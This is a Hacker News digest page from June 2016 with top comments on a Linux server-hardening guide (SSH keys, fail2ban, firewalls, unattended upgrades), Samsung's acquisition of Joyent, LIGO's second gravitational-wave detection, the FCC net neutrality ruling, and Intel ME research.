hacker news with inline top comments    .. more ..    18 Jun 2016 Best
home   ask   best   3 years ago   
1
My First 10 Minutes on a Server codelitt.com
1247 points by codelitt  2 days ago   284 comments top 58
1
brokenwren 2 days ago 8 replies      
This one is pretty decent but if you want the ultimate guide check out this one:

https://www.inversoft.com/guides/2016-guide-to-user-data-sec...

It covers 10x what all the other guides cover in terms of server and application security. It was posted a few weeks ago on HN but didn't make the front-page.

2
jldugger 2 days ago 6 replies      
> We don't even have a password for our root user. We'll want to select something random and complex.

So you're taking something secure by default -- no password means no login allowed, and making it less secure. And if you have hundreds of these servers, you'll need to rotate them whenever someone on the team leaves. This is painful.

Simple solution: leave root password blank, don't forget your sudo password. If you can't get in, use grub or a liveCD. Or tie auth to ldap or kerberos so you _can't_ forget. This is one area where Windows has a distinct advantage: AD more or less requires admins to think at the level of network of servers, and provides a baseline set of services always present.

3
malingo 2 days ago 2 replies      
This is good advice on achieving the most secure SSH configuration:https://stribika.github.io/2015/01/04/secure-secure-shell.ht...

"My goal with this post here is to make NSA analysts sad."

4
tjohns 2 days ago 3 replies      
> I check our logwatch email every morning and thoroughly enjoy watching several hundreds (sometimes 1000s) of attempts at gaining access with little prevail.

This is something that actually bugs me a bit. These attacks are so common, getting emails like this every day contributes to alarm fatigue. (https://en.wikipedia.org/wiki/Alarm_fatigue)

I'd love to see the Linux nightly security scripts replaced with something that only sends out emails when there's an specific actionable event I need to pay attention to. Ideally in a way that can easily be aggregated over all the machines I manage.

5
chrisfosterelli 2 days ago 1 reply      
> sudo ufw allow from {your-ip} to any port 22

I'm surprised nobody mentioned this is a great way to shoot yourself in the foot if you don't have a static IP.

6
Someone1234 2 days ago 4 replies      
Why do people install fail2ban then disable password based authentication entirely? I legitimately don't understand the purpose.

Also, they complain about log spam (from failed SSH attempts) this is one reason to move SSH to a different port. It does NOT increase security, but it DOES reduce log spam from bots trying for easy targets.

7
ryanmarsh 2 days ago 14 replies      
I don't mean to sound flippant but why can't these "lock down your new box" tutorials just be a bash script? Shouldn't they be?
8
nblr 2 days ago 2 replies      
Fail2ban? sshguard? unnecessary.Just disable ssh passwd auth (which generally is a good idea) -> done/done

If you don't like lognoise from ssh scanners (even if you disable passwd auth), move your sshd port to some random high port and make note of it in your ~/.ssh/config

Generally: if in doubt, take the more simple and elegant solution to a problem.

9
teddyh 2 days ago 0 replies      
I prefer the Securing Debian Manual its an official manual from the Debian project.

https://www.debian.org/doc/manuals/securing-debian-howto/

10
p8donald 1 day ago 1 reply      
Since I changed the default SSH port of 22 to something else (like 4422), I no longer get any of these drive-by attacks and don't need fail2ban anymore.

I also like to set up a simple Monit configuration to alert me about high cpu usage or when the disk space is about to run out. Instead of emailing me these alerts (and also weekly reports) I've configured Monit to post them to my Slack team of 1.

https://peteris.rocks/blog/monit-configuration-with-slack/

11
seagreen 2 days ago 1 reply      
Great tactical advice, but what a sad situation to be in. "Run this command, then run this command, then run this command ..."

There should be a single configuration file (or set of files) that declaratively describes the whole state of the machine. That way the exact situation of the server can be reviewed by just looking at files, instead of trying to poke and prod at the machine to see what commands have been run over the last X weeks.

12
raimue 2 days ago 2 replies      
Be aware fail2ban does not handle IPv6 at all with its default configuration on Debian/Ubuntu.

https://github.com/fail2ban/fail2ban/issues/1123

13
adrianmsmith 2 days ago 7 replies      
What's the reason for using a firewall?

Assuming that services which shouldn't be accessible to the outside only listen to localhost not the network (e.g. MySQL on a LAMP stack), isn't that sufficient?

(Honest question, I don't have much experience with syadmin.)

14
elbear 2 days ago 2 replies      
Here's an Ansible role (I made it) that automates the steps described in the article: https://github.com/LucianU/ansible-secure.
15
walrus01 2 days ago 1 reply      
For those saying "why fail2ban?", fail2ban can be used for a great deal more than just watching the sshd log. You can activate fail2ban rules for apache and nginx which help significantly with small DDoS, turning spurious traffic/login attempts into iptables DROP rules. And a lot of other daemons.
16
tobltobs 2 days ago 4 replies      
Can somebody help me out with this question: The default config for unattended-upgrades seems to not enable reboot even if a reboot would be required to activate the upgrades. Wouldn't that had made quite a few important upgrades in the last years effectless if they server did never get rebooted?
17
babuskov 2 days ago 1 reply      
> First we'll want to make sure that we are supporting IPv6

How does that help security?

18
jboynyc 2 days ago 2 replies      
I'm finding that another important step is this one:

apt-get install etckeeper && cd /etc && etckeeper init

Keeps your /etc under version control so you know what kinds of configuration changes you've perpetrated.

19
rodolphoarruda 2 days ago 3 replies      
I'd be more curious to see a "My first 10 minutes on an Ubuntu desktop" version of the article.
20
tmaly 2 days ago 2 replies      
I have been meaning to write up a similar guide.

I would like to recommend using just iptables instead of ufw, I had a case on my vps where an update to ufw failed and then the firewall was not working.

With iptables, install iptables-persistent package so they are saved when you do restarts. Do not try to block entire country ip ranges as this slows the machine down substantially.

fail2ban is great, I would recommend looking at some of your system logs to figure out new rules to add.

21
jtchang 2 days ago 3 replies      
Why don't they disable root logins with password period and only allow SSH key authentication?

Also if you put a passphase on your SSH key does that mean you have to enter it every time you want to SSH to the server (in order to unlock the key) or does it stay cached on most SSH clients (ssh on mac terminal, putty on windows, etc).

Isn't watching failed logins kind of useless? I think it is more important to see what successful logins were made.

22
drzaiusapelord 2 days ago 0 replies      
Its a tradition to nitpick these kinds of lists. Here's my take.

>I generally agree with Bryan that you'll want to disable normal updates and only enable security updates.

Hmm, fairly certain the Ubuntu (and others) don't do major product updates or API breaking updates via apt-get. You shouldnt have to worry about breaking anything if you use normal updates. This seems a bit too conservative for me and leads to problems down the line of being on an ancient or bugged library and then having to do the update manually later, usually after wasting a couple hours googling why $sexy_new_application isn't working right on that server.

He setup an email alert, but not an smtp to actually send it. Also, OSSEC takes a few seconds to install and is much nicer than emailing full logs.

Lastly, fail2ban is becoming a sysadmin snake-oil/fix-all. Its use is questionable in many circumstances. There's a real chance of being locked out of your own server with this. If people are recommending it, they should be giving noob-friendly instruction to whitelist their IP at the very least.

23
taf2 2 days ago 2 replies      
Not sure if others feel this way but adding this line to sudo never felt right to me...

deploy ALL=(ALL) ALL

I usually instead limit the deploy user to a smaller subset of commands e.g. the init.d script to control a service.

obviously if someone gained access to deploy user we're probably sol anyway... but it just makes it seem safer... we have a to login as an ops user to install or update things on the boxes.

24
kikimeter 2 days ago 0 replies      
I created a script that does almost everything automatically using Ansible and Ansible Vault : https://github.com/guillaumevincent/Ansible-My-First-5-Minut...
25
catmanjan 2 days ago 1 reply      
One of the suggestions is to make sure your public key has the .pub extension, and they imply that if someone didn't include the extension they would be reprimanded - any reason for this in particular?
26
dawkins 2 days ago 2 replies      
I always worry that adding 2FA could make your machine inaccessible if anything happens to google-authenticator in this case. Maybe it's a little bit of paranoia but I don't like the idea of giving control over my ability to log into my server.
27
amelius 2 days ago 2 replies      
For protecting against brute-force login attempts, I use sshguard [1]

I really think this should be installed by default on distros like Ubuntu.

[1] http://www.sshguard.net/

28
SadWebDeveloper 2 days ago 0 replies      
Forgot to check if the server isn't backdoored. You will be surprised how many providers add many backdoors and monitoring systems you don't need (m looking at you AWS guys).
29
usaphp 2 days ago 1 reply      
> "You should never be logging on to a server as root."

Can someone explain me, let's say I disabled password logins and only allow login via a key, what are potential downsides of logging in as a root?

30
Theodores 2 days ago 1 reply      
I would be annoyed with a cryptic Audi password. I would prefer 'BatteryHorseStaple' passwords. Anything I can't remember gets written on a post it note and put next to my screen with what it is for. This is my behaviour and the problem with cryptic passwords is that there are others like me, willing to keep a good password secret and not willing to be so secret about a clumsy, easy to crack by machine but impossible to remember password.
31
javajosh 2 days ago 0 replies      
It may be useful, at step 0, to check out the server and see basic server orientation. Which Linux is it (cat /etc/*-release)? How much ram and disk (htop, df)? How is the filesystem setup (mount)? What packages are already installed (dpkg -l)? What processes are running (ps aux, htop)? What did the last root, including me, do (history)? I also like to know where is the box physically, roughly (tracert, run locally).
32
archon810 2 days ago 2 replies      
My biggest concern with being on a VPS like Linode, once you're all done securing yourself and binding services to the local LAN IP, is an attack from within the network. The VPS you own is also accessible by others on the same subnet, contrary to what you might assume.

I'd love to see a ufw guide for whitelisting only your own internal IPs to be allowed access to any services for ultimate security.

33
bikamonki 1 day ago 0 replies      
Why not make a certified secured best practice 99% covered snapshot and share it as part of the one-click installs that most VPS providers offer nowadays?
34
overcast 2 days ago 0 replies      
Very useful, most of this stuff is pretty common for anyone who has done any regular sysadmin work, but definitely good to have a checklist.
35
cleeus 2 days ago 3 replies      
echo "set background=dark" > /etc/vim/vimrc.local
36
VLM 2 days ago 2 replies      
Technically you don't need the root password, you can always password recovery if you have access to the box. And how exactly did you lock yourself out of every account with sudo? Of course there's always "messed up my ldap or general network settings, can't log in to fix them". There's nothing wrong with setting your root password to a random string and throwing it away, after verifying your sudo works, I guess.

I will admit to being lazy, and with full automation its faster to spawn a new virtual image and let ansible run its course than to do root password recovery where you boot and tell the bootloader to make the init system /bin/sh and hand edit /etc/shadow and /etc/passwd and then reboot again, etc etc. I mean I can set up a new image almost as fast as I can reboot an old image, and I set up images a lot more often than I do password recovery, so...

Scrap the ssh commentary and set up ssh company wide as per stribika plus or minus local modifications:

https://stribika.github.io/2015/01/04/secure-secure-shell.ht...

"On large scale, you'll be better off with a full automated setup using something like Ansible"

At ANY scale you're better off, unless you're experimenting or time isn't money. It'll take longer to add the time to document and test what you're doing by hand than to convince ansible to do it for you. If you don't document or test you're just doomed, so its not like you can avoid that effort. With automation this is like "first two minutes on a server" not ten.

Some people like to drop a .forward in root's homedir sending mail to your sysadmin mailing list or yourself. I THINK but might be wrong that if you do that you don't have to tell logwatch whom to email to, it'll go to root then forward to the right people. More than logwatch assumes root@something.whatever exists as an email address.

You're missing setting up your centralized rsyslog or local equivalent, your munin/nagios/zabbix or local equivalent... I still configure zabbix by hand because I'm old fashioned but its possible to automate that.

NTP is also missing. You can make Kerberos a very sad faced puppy if time isn't synced. And its easy to set up to point to local trusted servers.

(Note, a post that's nothing but complaining still means the linked article is at least 99.9% correct, it is a nicely written wide ranging TODO list)

37
thatusertwo 2 days ago 0 replies      
I have a VPS, when I first got it, it had an additional user setup for some unknown reason. I didn't know it was there until my server was hacked by a bot. I'd suggest adding one step of checking the /home directory or other places to make sure no 'unknown' accounts have been set up.
38
timroy 2 days ago 0 replies      
Thanks for this article - very clear, well-motivated, and concise. I'm saving this for myself and others.
39
windsurfer 2 days ago 1 reply      
I guess I'm a pretty big noob, but why do people recommend so strongly on password protecting your private key? Losing it pretty much dooms you whether or not it's password protected. It might get you a few hours or so to react and invalidate the public key, I guess...
40
dmourati 1 day ago 0 replies      
Anyone remember Bastille Linux? https://help.ubuntu.com/community/BastilleLinux
41
feross 2 days ago 0 replies      
This is very similar to my "How To Set Up Your Linode For Maximum Awesomeness" guide:

http://feross.org/how-to-setup-your-linode/

42
agentgt 2 days ago 0 replies      
It might nice if there were some cloud vendor specific addendums. For example on rackspace you almost always want to install the monitoring daemon (it's actually fairly decent and small foot print).
43
z3t4 2 days ago 0 replies      
If you open up access from/to port 80 or 443, you also open up access to all trojans/spyware/telemetry/auto-update created in the last ten years. You'll want to limit access per user and process.
44
chrisper 2 days ago 0 replies      
Instead of using unattended-upgrade, I prefer to subscribe to mailinglists and see when there are new securtiy updates.

One could combine that with something like rundeck where you run apt-get upgrade.

45
a_imho 2 days ago 1 reply      
I think 2FA is generally bad practice and quite sad it is ubiquitous in e.g. banking and people try to shove it everywhere. It is analogous to password rules, 8-14 characters, numbers, capital letters and other signs. Yet it is very rare you can use a 40+ character passphrase. It gives a false sense of added security, while being annoying at the same time imo. It is very common, for me at least, not to have access to my phone all the time, because I left it at home, in the car etc. Not to mention if you lose it (or someone steals it) you have a huge pita to deal with.
46
PerfectElement 2 days ago 0 replies      
Is there a similar guide for Windows servers out there?
47
Hello71 2 days ago 0 replies      
1.

 useradd -m deploy
2. "PasswordAuthentication no" probably won't work as you expect if UsePAM is on.

48
ec109685 2 days ago 4 replies      
It would be useful to discuss what prevents the server from being rooted without a trace during the 10 minutes it takes to execute these steps.
49
mmgutz 2 days ago 1 reply      
Hmmm ... why does root need a password? `sudo su`
50
brndnmg 2 days ago 1 reply      
May I suggest Ansible or whatever other provisioning tool, you can subtract 9+ minutes from the title...
51
dewarrn1 2 days ago 0 replies      
Nice guide, better comments, leaving this here for later reference.
52
cfieber 2 days ago 0 replies      
sure makes me glad all that (and so much more) happens in the first negative 10 minutes on any server I deploy.

If you are doing this after your server has launched you are doing it wrong.

53
stonogo 2 days ago 1 reply      
No production server should ever be manually configured.
54
tdalaa 2 days ago 0 replies      
Pretty useful, thanks
55
plusbryan 2 days ago 1 reply      
What was wrong with 5 minutes? :-)
56
ck2 2 days ago 0 replies      
Don't just change SSH key requirements, also change SSH port.

Port 22 is possibly the most heavily scanned port around.

57
nanis 2 days ago 0 replies      
Sigh ... "principal of least privilege"
58
YngwieMalware 2 days ago 1 reply      
I'd been using this article for a couple years when I was a Linux server neophyte and now some of these things seem obvious to me. A good article for total noobs.
2
Samsung Acquires Joyent joyent.com
777 points by yunong  2 days ago   231 comments top 35
1
urza 1 day ago 7 replies      
Cloud orchestration, Container Orchestration, Kubernetes... I think I am getting old and starting to understand how my parents feel about technology.

I am developer, but mostly work on desktop apps, or embedded devices or lataly on some MVC applications. But reading things like

"A Container-Native Stack for Modern Applications and OperationsIncrease development velocity while simplifying operations."

I have no idea what should I imagine and what is it good for...

any good introduction or explanation into what is it they actually do?

2
bcantrill 2 days ago 18 replies      
In case anyone's curious, I blogged about the backstory of the acquisition.[1] tl;dr: We at Joyent are elated, and we believe that this will be a huge win for our customers, for our technologies and for the communities that they serve!

[1] https://www.joyent.com/blog/samsung-acquires-joyent-a-ctos-p...

3
cpprototypes 2 days ago 5 replies      
Samsung is a typical asian electronics company (has a hardware focused history and very good at it, but doesn't understand or respect software). I'm so glad that node.js is not under Joyent control.
4
knurdle 1 day ago 4 replies      
Hey, maybe Joyent can finally afford to refund the people who supported it when it was textdrive and then went back on their word!Snarky I know but I'm still bitter about how it was all handled..
5
sintaxi 2 days ago 1 reply      
Hats off Samsung. You have just acquired a truly world class Engineering team.

Congrats to all my former colleagues who are absolutely amazing at their jobs and wonderful people to work with. Samsung looks like a very good match. Hope the transition goes well.

6
a_small_island 1 day ago 0 replies      
Joyent raised over $125M in venture [0], and no mention of a price? Wonder how the employees faired in this...

[0] https://www.crunchbase.com/organization/joyent

7
Negative1 2 days ago 3 replies      
Forgive my ignorance but can someone explain how Joyent's acquisition moves Samsung towards their strategic objectives? In other words, how are they going to exploit this technology (and brain gain)?
8
hitr 2 days ago 3 replies      
I always thought Microsoft/Google or the likes would acquire Joyent as it is good product fit. Microsoft chose linkedin instead :)For Samsung this is all about IoT .Samsung wants to own both the devices and backend. A good move IMHO
9
ruffrey 2 days ago 3 replies      
Luckily they did not acquire Node.js

edit: I should have been more specific.. when an open source project is under a company's wing and it gets acquired, you don't know what can happen, even under MIT. Look at express recently. Since it's the under the Node Foundation now, this is not a big deal. Had it happened a short time ago, there may have been further turmoil in the community.

10
yangtheman 1 day ago 0 replies      
As a Korean American who also has worked at Samsung headquarters, I think it's more of bad news than good news, no matter how Joyent wants to spin it.

Its corporate culture only allows the most cunning, politically savvy person to stay alive and move up the rank, and thus most executives (all if I limit it to small sample of executives I've personally met) fit that model.

And shit literally flows downwards, where goals/promises set by them would be pushed downwards and engineers have to take the burden.

It doesn't help that Korean society is very hierarchal and based on Confucius principles, where you don't usually challenge older persons and/or someone higher in the rank. This is one example that describes serious problem - http://thediplomat.com/2013/07/asiana-airlines-crash-a-cockp....

For those of you who are intrigued and have time, I suggest watching Misaeng with English subtitles (https://www.viki.com/tv/20812c-incomplete-life). Samsung isn't as bad, but the same hierarchy, verbal abuse, social dynamics, and strict rules on paper format exist.

The best outcome would be if they leave Joyent's management and culture alone. But I doubt it.

I also have the first-hand experience of their applying the same "consumer electronics" mentality to completely different business which required high-touch sales.

There is no denying success of Samsung - multi-billion, international corporation. However, Samsung is only good at generating quality hardware products at mass scale. There have not been success in any sort of software and services. Perhaps they are trying to expand beyond their strengths, and I applaud that effort and they actually do need it, since it's only matter of time Chinese companies will catch up and produce as quality products as Samsung, as Samsung did to Sony. I hope it bears fruits. I hope they can allow Joyent to succeed and thrive, and learn from that.

I will see what happens next few years.

11
monatron 1 day ago 0 replies      
As I toil away on a node based project that is interfacing with Samsung's Artik platform (both the Artik 10 board and Artik Cloud) I finally decided to call it a night -- check HN real quick -- and discover that Samsung is buying the original stewards of node. I almost thought the lack of sleep was putting me into psychosis...
12
andrewwhartion 1 day ago 0 replies      
Well done guys on staying solvent longer than the market could stay irrational!
13
bobsil1 2 days ago 1 reply      
This is John Gruber's nightmare :) (worked at Joyent before Daring Fireball)
14
brotherjerky 2 days ago 2 replies      
So the biggest phone manufacturer now owns a lot of Node.js expertise. Hopefully that leads to more JS in mobile!
15
vermontdevil 2 days ago 1 reply      
Is this the same company that sponsored the development of Node JS?
16
leommoore 1 day ago 0 replies      
Best wishes to all at Joyent. Thanks for all your work in the community over the last few years, particularly with node.js. Hopefully Samsung will give you the resources and reach to go on to better things in future.
17
corv 1 day ago 0 replies      
"Joyent will operate as a standalone company under Samsung and continue providing cloud infrastructure and software services to its customers"
18
ethbro 2 days ago 2 replies      
So this is the moment where everyone with a sufficient device / install marketshare decides they need to buy cloud expertise?

"Samsung will immediately benefit from having direct access to Joyents technology, leadership and talent. Likewise, Joyent will be able to take advantage of Samsungs scale of business, global footprint, financial muscle and its brand power."

19
subway 1 day ago 2 replies      
SmartOS will be on ARM within 12 months. Calling it.
20
alrs 1 day ago 0 replies      
This is great news for on-prem object storage. I look forward to seeing how big Samsung is able to go with Manta.
21
d2ncal 1 day ago 0 replies      
If anyone has a good background, what exactly does Joyent have that is so valuable?

It seems that NodeJS has moved out of Joyent. They have hosted container support that seems to run on solaris, which seems interesting, but a bit too much of buzz-wordy from their website.

I am not very familiar with this, so will be great if someone can explain a little bit. I read the comments around orchestration, but am more interested in Joyent's value proposition.

22
unixhero 1 day ago 0 replies      
Congrats Bryan.

If anybody deserve it, it's you guys.

23
hoodoof 2 days ago 0 replies      
I wonder how much for.
24
bogomipz 1 day ago 0 replies      
I'm sorry but how is this a good fit? What is the synergy here? This particular sentence is incredibly vapid:

"By bringing these two companies together we are creating the opportunity to develop and bring to market vertically integrated mobile and IoT services and solutions that deliver extraordinary simplicity and value to our customers."

25
OhHeyItsE 1 day ago 0 replies      
Can anyone shed some light (speculate, perhaps) on Samsung's strategy here? Just seems like an odd pairing to me.
26
ChrisArchitect 1 day ago 0 replies      
wow, Joyent. Took me a bit to remember what they were doing in the early early days since we're multiple generations or pivots or focus-shifts on now......but it was Textdrive/Textile/Textpattern CMS. Ha. Different times. At least some of that still out there in OSS Land
27
sidcool 1 day ago 0 replies      
I wonder what would Samsung gain from an IaaS kind of company. Do they have an IaaS product? Or is it for internal use?
28
carapace 1 day ago 0 replies      
(Thin sans-serif body text means you hate your readers.)
29
st3v3r 11 hours ago 0 replies      
Well that sucks. They had a good run, but Samsung's business culture is probably going to ruin them. Just check out some of the stories of their internal software engineering process.
30
crudbug 1 day ago 0 replies      
Next up some SmartOS desktop / mobile builds
31
beaugunderson 1 day ago 0 replies      
One company with all-male board & management team buys another company with all-male board & management team.
32
caffed 1 day ago 0 replies      
Ok... Let's start on iojs 7!
33
mattbettinson 2 days ago 3 replies      
Thought this said Joylent. Was confused.
34
krakensden 2 days ago 2 replies      
Good luck on your incredible journey.
35
ClassyPuff 1 day ago 0 replies      
Great news and good acquisition as well. Great work Samsung!!!!!
3
Second Gravitational Wave Detected at LIGO aps.org
614 points by specialp  2 days ago   172 comments top 23
1
lpage 2 days ago 5 replies      
For those curious about the future of LIGO...

At present there are two LIGO facilities - one in Hanford, Washington and another in Livingston, Louisiana. This is necessary for both denoising (it's unlikely that a seismic event or random perturbation would effect both simultaneously) and triangulation via parallax.

Right now having just two facilities (that are relatively close together) limits localization to broad regions of the sky. Additional facilities are under way/in discussion for Europe, Japan, and India. This would significantly improve both the sensitivity of the array and its ability to localize events in a smaller region of the sky. Hopefully these projects get funded. LIGO stands to resolve some of the biggest open questions we have in cosmology.

2
rubidium 2 days ago 0 replies      
"It is very significant that these black holes were much less massive than those observed in the first detection, Gabriela Gonzalez, LIGO's spokesperson, said in a statement. Because of their lighter masses compared to the first detection, they spent more timeabout one secondin the sensitive band of the detectors. It is a promising start to mapping the populations of black holes in our Universe."

from http://arstechnica.com/science/2016/06/ligo-data-includes-at...

3
noselfrighteous 39 minutes ago 0 replies      
I have a side question. If gravity (i.e. warping of space time) propagates at the speed of light. Then does that mean that the Alcubierre warp drive is fundamentally incapable of supra-light speeds?
4
yread 2 days ago 5 replies      
My wife has this really stupid (or brilliant?) question - if during the collision one solar mass turned into gravitational waves is it possible to create mass from gravitational waves?
5
macintux 2 days ago 0 replies      
The article linked from that page is more useful to the physics-challenged such as myself: http://link.aps.org/doi/10.1103/Physics.9.68
6
BenoitP 2 days ago 4 replies      
How come: 14.2 + 7.5 == 21.7 != 20.8 ?

Does the gravitational wave contain 0.9 solar masses of energy?

7
nonbel 2 days ago 3 replies      
This signal was reported on months ago. Can anyone explain what they did to move the GW151226 signal from 2-sigma to >5-sigma?

"The data is in fact completely open and you could analyse it yourself! In addition to the GW150914 event there are also two others that rise somewhat above the background ("GW151012" and "GW151226"). You can see them by eye in the above plot. They are clearly not statistically significant enough to announce a discovery alone, but still they are tantalising... with room for improvement to design sensitivity (by a factor of ~2 which increases the spatial reach by 2^3) and the construction of a third detector in India to triangulate the signal, the future of gravitational wave astronomy is exciting."http://syymmetries.blogspot.com/2016_03_01_archive.html

8
devy 2 days ago 5 replies      
Can someone who has expertise explain the significance of this in plain English please?
9
kirykl 2 days ago 0 replies      
10
mudil 2 days ago 3 replies      
When gravitational waves are released from the merger of two black holes, the combined mass of the resultant black hole is less than sum of its component black holes, because some of the mass was released in the form gravitational waves.

Questions.

What are the implications of this on black hole entropy and temperature? Can black holes evaporate from gravitational radiation alone without Hawkins radiation?

What are the implications of this on the mass of any object in the universe, since all objects are related to each other gravitationally and the universe is expanding? Does it mean objects are constantly loosing mass and the universe is filled with energy from this release? Can dark energy be related to this process? Can universe be expanding because matter is constantly lost into the gravitational waves?

What are the implications of gravitational waves on the fabric of spacetime, if objects are constantly leaking gravitational waves in a nonstatic universe?

11
eaq 2 days ago 0 replies      
Data and audio files relevant to this event are available to the public at https://losc.ligo.org/events/GW151226/

There are also Jupyter tutorials on processing GW signals at https://losc.ligo.org/tutorials/

12
cyphar 2 days ago 0 replies      
I was lucky enough to be in an astrophysics faculty (doing a research project) when the LIGO paper was published. Everyone was super excited and was printing off papers and discussing the experiment, results and future of astronomy. It was really something else to see that many clever minds so excited about a result that many scientists involved in the field of cosmology and relativity didn't live to see.
13
Jerry2 2 days ago 3 replies      
How do we know that these waves they're detecting are from collisions of black holes? How do they locate these black holes and how do they make these conclusions that what they detect is coming from black hole Alpha & Beta colliding?
14
etrautmann 2 days ago 2 replies      
Interesting to note that the y-scale on figure 1 is 10^-21 (units of strain). Measurement at that scale is absolutely insane. The power of good engineering, incredible optics, and lots of averaging.
15
ars 2 days ago 3 replies      
Something I've asked before but got no answer - at these extreme masses, velocities, and forces time dilation has got to be immense.

Yet the article makes no mention of this whatsoever.

16
an_account_name 2 days ago 0 replies      
So, I remember hearing about LIGO when the first wave was detected, and was excited by it - but I had never heard of it before that.

What other experiments are running that would generate similar excitement from the science community that I probably haven't heard of yet?

17
JumpCrisscross 2 days ago 0 replies      
One of my favourite things to do, when I'm back in California, is attend SLAC Public Lectures [1]. (There is a disturbing paucity of scientific cultural institutions in New York.) The most recent one was by Dr. Brian Lantz about LIGO [2].

[1] https://www6.slac.stanford.edu/community/public-lectures.asp...

[2] https://www.youtube.com/watch?v=EMzoQAmK8Dc

18
heegemcgee 2 days ago 2 replies      
>he signal persisted in the LIGO frequency band for approximately 1 s, increasing in frequency and amplitude over about 55 cycles from 35 to 450 Hz

Would love to hear an audio facsimile of what this might "sound" like.

20
scrumper 2 days ago 2 replies      
What does the last line of the abstract refer to, about "deviations from general relativity"? Is it simply a statement that this (and other) observations of gravity waves are another tool for verifying GR's predictions?
21
ksec 1 day ago 0 replies      
How far are we from creating Gravity Shockwave Generating Division Tool? A.k.a Goldion Crusher.
22
jayess 2 days ago 2 replies      
Could black holes lose their mass through the propagation (generation?) of gravitational waves?
23
peter303 2 days ago 0 replies      
I thought the shaking was Santa on the roof!
4
Appeals court upholds FCC's net neutrality order politico.com
588 points by textdog  3 days ago   262 comments top 15
1
grellas 3 days ago 28 replies      
How we got to the point where utility-style regulation is seen as the key to ensuring a free and open internet is a true puzzle.

Utility-style regulation gives regulators plenary authority over the internet - meaning full and complete. Their power to do this or to forbid that is highly discretionary and essentially boundless.

This in turn gives a gatekeeper role to the regulators: you play by their rules or you don't play. And that means they have final say over what happens across the internet, at least within U.S. jurisdiction.

So today they say net neutrality rules.

Tomorrow maybe it is price controls in the name of consumer fairness. Or maybe it is mandated compliance with government snooping orders in the name of national security. Or who knows what not?

Why not? With a utility-style regulatory framework, you essentially have a form of administrative law run wild, legally speaking. Standards are exceedingly vague, power is wildly broad, and (in the end) he who has the most power and pull to control the regulators winds up having the final say over what the law is or is not as it affects the internet.

This is the exact antithesis of the largely hands-off idea of what the government could do with respect to the internet over the past several decades.

Of course law tends to conform in the short term to what people want and, today, most people truly do want a free and open internet. Therefore, the risk of any existential threat to internet freedom is either minimal or non-existent in the short term.

But if your idea of preserving maximum internet freedom is in effect to place a loaded gun to its head and then declare it is not a problem because it is the good guys who control it and who therefore will use it only for good purposes, then you have what you want with utility-style regulation of the internet.

It might just work great as long as the good guys are in control. But what happens when it changes some day? And, if you think it cannot, then you have far, far more faith in human nature than I can possibly summon.

Welcome to the brave new world.

2
StavrosK 3 days ago 9 replies      
Can someone explain what this means? The term "net neutrality" has been muddled so much that I can't tell if it means what it actually says, or if it's distorted doublespeak that actually means the opposite.

Is this decision good or bad for us?

3
billiam 3 days ago 1 reply      
Second to last nail in the coffin. Yay. Sometimes the interests of hundreds of millions of people can in fact outweigh the interests of two corporations. With so many things about our society under attack, this is good news. attack,
4
bcheung 3 days ago 0 replies      
What are the specifics in regard to peering? It seemed like with Netflix there was some confusion and FUD and it was hard to know the exact facts.

Normally as a business you are required to purchase bandwidth from bandwidth providers. I would assume this would still stand.

What counts as throttling? If an ISP has multiple peering connections with backbone providers are they forced to upgrade their hardware to compensate for all the traffic coming from their peer? If so, what counts as sufficient quality?

If they upgrade some peering connections and not others is that breaking Net Neutrality?

My understanding, not sure if it is correct, was that Netflix had traffic on an Internet backbone and Comcast was selectively throttling traffic within the peering connection based on whether it was Netflix traffic. I can see how that is discriminatory and wrong.

Anyone have more details about how all this works specifically?

5
russnewcomer 3 days ago 1 reply      
Generally glad that the order was upheld. I do wish that zero rating was more clearly defined, but regulation is just as much a reactive task as a proactive one, and it will be interesting to see how the ISPs use that tool in their toolbox. My suspicion is that we would see general price increases but then a 'zero rating' for, say, streaming video, making it seem like a good deal. Video seems cheaper but is really just subsidized by the rest of the content.

I see a parallel there to how the health insurance situation in America seems to have played out over the last few years from the view point of the average middle class developer.

6
shmerl 3 days ago 0 replies      
Good! What about efforts to repeal monopolistic state bans on municipal broadband? FCC was also in the middle of some court cases about it. Is there any progress?
7
dreamdu5t 3 days ago 2 replies      
Can someone explain why T-Mobile is legally allowed to provide free streaming for YouTube and Netflix? Didn't net neutrality prevent that? Or am I just out of the loop?

The thing is... I like them preferentially treating YouTube and Netflix traffic by not counting it towards my bandwidth limit. The "fair" alternative sucks: I would simply not stream on my phone anymore because it would be too expensive.

8
jojohack 3 days ago 1 reply      
Does this mean I can finally watch HBO GO on my PS4 via my Comcast account?
9
bcheung 3 days ago 1 reply      
How does this relate to high frequency trading and paying more to get access to servers closer to the exchange?

Is that paid prioritization / a fast lane? Or is that just purchasing a better plan?

Where is the line drawn?

10
nemock 3 days ago 0 replies      
I think it'll be a while before we are out of the woods on this one. The culprits continue to thumb their nose at the FCC and openly challenge their authority.
11
sova 3 days ago 0 replies      
Hurray for common sense!
12
daveheq 3 days ago 0 replies      
The politicians know they can never get past the technologists; not because they make them so much money, but because they're smarter than they are.
13
pmoriarty 3 days ago 1 reply      
Can ISPs still charge for more bandwidth?
14
dang 3 days ago 0 replies      
15
droopybuns 3 days ago 4 replies      
Tom Wheeler says this:

"Notably, the Open Internet Order does not affect zero-rating services like T-Mobile's BingeOn or Verizon's Go90, which are intentionally left out of the scope of the order. "I can argue there are some aspects of [zero rating] that are good, and I can argue theres some aspects of it that are not so good," Wheeler told The Verge in an interview in March. "The job of the regulator is to figure out, 'Okay, now how do I deal with this?'"

Outrageous behavior, followed up by outrageous commentary. This FCC is out of control. How does anyone invest in wireless with regulators like this? Is Tom Wheeler even aware of the chilling affect of commentary like this?

Edit: The quote above is from the fine article.

Wmeredith: I'm talking about is Tom Wheeler, chair of the FCC. In this particular quote, the regulator of the laws is saying (at least as far as I can tell), that he's going to pick and choose which players he regulates. Should I assume you're arguing that my quote from the article is fud, or is it my commentary? Or my interpretation of it?

I'm not being a troll. I have an honest disagreement that this is the right thing to do. Would you invest in any climate with a regulator who says things like this? It seems wildly more risky to me.

5
The Intel ME subsystem can take over your machine, can't be audited boingboing.net
625 points by cylo  2 days ago   265 comments top 47
1
nneonneo 1 day ago 3 replies      
Igor Skochinsky (of IDA Hex-Rays fame, among others) has been studying Intel ME for quite some time. He gave a nice talk at Breakpoint summarizing what he'd discovered (slides here [pdf]: https://github.com/skochinsky/papers/blob/master/2014-10%20%...).

Among other things, he finds that ME is capable of running signed Java code which is pushed to the device. Due to the complexity and size of the Java code, it's quite likely to have bugs.

